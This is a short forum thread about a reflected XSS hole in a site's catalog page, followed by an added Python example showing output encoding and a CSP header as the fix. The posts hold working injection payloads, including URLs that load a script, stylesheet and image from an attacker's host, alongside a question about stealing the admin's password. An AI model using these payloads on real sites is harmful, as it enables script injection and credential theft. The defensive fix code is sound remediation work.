Question about XSS

Discussion in 'Sandbox' started by Sensoft, 13 Apr 2016.

  1. Sensoft

    catalog/?firm=%27"--></style></scRipt><scRipt>alert(0x0001B6)</scRipt>
    So here's the question: what can be done with this XSS?
     
  2. Sensoft

  3. yarbabin

    all the same things as with other XSS
     
  4. Sensoft

    Can you steal the admin's password or something like that?
     
  5. yarbabin

    roughly everything that JS lets you do
     
  6. M_script

    There's also image injection
    Code:
    http://site.ru/catalog/?collection=<img src="http://mysite/xxx.jpg" />
    style injection
    Code:
    http://site.ru/catalog/?collection=<link rel="stylesheet" href="http://mysite/xxx.css" />
    And script injection
    Code:
    http://site.ru/catalog/?collection=<script src="http://mysite/xxx.js"></script>
    In short, you've completely broken this site.
     
    Mypa, frank, t0ma5 and 3 others like this.
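
The fix for the reflection shown in this thread, as an added example that is not part of any post: the same `firm` / `collection` values rendered without and with output encoding, then checked by counting the tags an HTML parser actually sees. The template and all function names are assumptions, since the thread does not show the site's markup.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# Parameter values as quoted in the thread (raw query-string form).
THREAD_VALUES = [
    '%27"--></style></scRipt><scRipt>alert(0x0001B6)</scRipt>',
    '<img src="http://mysite/xxx.jpg" />',
    '<link rel="stylesheet" href="http://mysite/xxx.css" />',
    '<script src="http://mysite/xxx.js"></script>',
]

# Assumed template: the value is reflected into element text and into a
# double-quoted attribute. The real page's markup is not shown in the thread.
TEMPLATE = '<h1>Catalog: {v}</h1><input name="firm" value="{v}">'
TEMPLATE_TAGS = ("h1", "input")


def render_unsafe(raw):
    """The bug: the decoded parameter is concatenated into the markup."""
    return TEMPLATE.format(v=unquote(raw))


def render_safe(raw):
    """The fix: HTML-encode at output time (<, >, &, and both quotes)."""
    return TEMPLATE.format(v=html.escape(unquote(raw), quote=True))


class TagCollector(HTMLParser):
    """Records every start tag an HTML parser sees in a rendered page."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_tags(page):
    """Start tags in the page beyond one copy of each template tag."""
    collector = TagCollector()
    collector.feed(page)
    collector.close()
    found = list(collector.tags)
    for tag in TEMPLATE_TAGS:
        if tag in found:
            found.remove(tag)
    return found
```

Output encoding is the fix; a `Content-Security-Policy: default-src 'self'` response header is a second layer under which the browser refuses inline script and the cross-origin image, stylesheet and script loads even if an encoding gap remains.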